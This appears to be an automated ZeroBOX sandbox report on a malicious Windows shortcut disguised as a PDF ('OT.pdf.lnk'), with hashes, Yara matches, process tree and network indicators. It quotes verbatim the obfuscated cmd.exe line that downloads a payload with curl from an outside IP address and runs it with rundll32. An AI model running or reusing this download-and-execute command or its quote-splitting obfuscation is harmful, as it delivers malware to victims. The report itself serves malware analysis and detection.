Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 27, 2023, 2:22 p.m.	Sept. 27, 2023, 2:24 p.m.

Size	1.9KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Wed Oct 6 04:51:36 2021, mtime=Tue Sep 26 02:07:07 2023, atime=Wed Oct 6 04:51:36 2021, length=289792, window=hidenormalshowminimized
MD5	`220870fa38f822a0403218114a08b31d`
SHA256	`2a900e5d6da04023152c42cee83a2563a20984c839d4f12510aa3769d3e83cb9`
CRC32	`72425343`
ssdeep	`24:8aY2WJCnBc2LA8Z1leG+/B52gI3Q/JqxIj2yi850:8aY0iAlen0gVJqxkK`
Yara	lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "SvDjmYYOk" C:\Users\test22\AppData\Local\Temp\OT.pdf.lnk
2648
- cmd.exe "C:\Windows\System32\cmd.exe" /c n4X || ECHo n4X & P"IN"G n4X || c"URl" h"t"t"p:"//13"5."1"2"5.17"7."82"/"U"MY"A"p"d4"/"uD -o C:\Users\test22\AppData\Local\Temp\n4X.log & P"IN"G -n 3 n4X || rundll32 C:\Users\test22\AppData\Local\Temp\n4X.log scab /k besogon728 & E"xI"T 'YbgZ=Rm=Hhj
  2776
  - PING.EXE P"IN"G n4X
    2860
  - curl.exe c"URl" h"t"t"p:"//13"5."1"2"5.17"7."82"/"U"MY"A"p"d4"/"uD -o C:\Users\test22\AppData\Local\Temp\n4X.log
    2932
  - PING.EXE P"IN"G -n 3 n4X
    604
  - rundll32.exe rundll32 C:\Users\test22\AppData\Local\Temp\n4X.log scab /k besogon728
    1384

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
135.125.177.82	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (5 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 27, 2023, 2:22 p.m.	buffer: 'n4X' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 27, 2023, 2:22 p.m.	buffer: n4X console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 2:22 p.m.	buffer: 'E"xI"T' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleA Sept. 27, 2023, 2:22 p.m.	buffer: Ping request could not find host n4X. Please check the name and try again. console_handle: 0x00000007	1	1
WriteConsoleA Sept. 27, 2023, 2:22 p.m.	buffer: Ping request could not find host n4X. Please check the name and try again. console_handle: 0x00000007	1	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\OT.pdf.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\cmd.exe" /c n4X || ECHo n4X & P"IN"G n4X || c"URl" h"t"t"p:"//13"5."1"2"5.17"7."82"/"U"MY"A"p"d4"/"uD -o C:\Users\test22\AppData\Local\Temp\n4X.log & P"IN"G -n 3 n4X || rundll32 C:\Users\test22\AppData\Local\Temp\n4X.log scab /k besogon728 & E"xI"T 'YbgZ=Rm=Hhj

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Communicates with host for which no DNS query was performed (1 event)

host

135.125.177.82

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2648 resumed a thread in remote process 2776
NtResumeThread Sept. 27, 2023, 2:22 p.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2776	1	0	0

Generates some ICMP traffic

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

135.125.177.82:80

OT.pdf.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All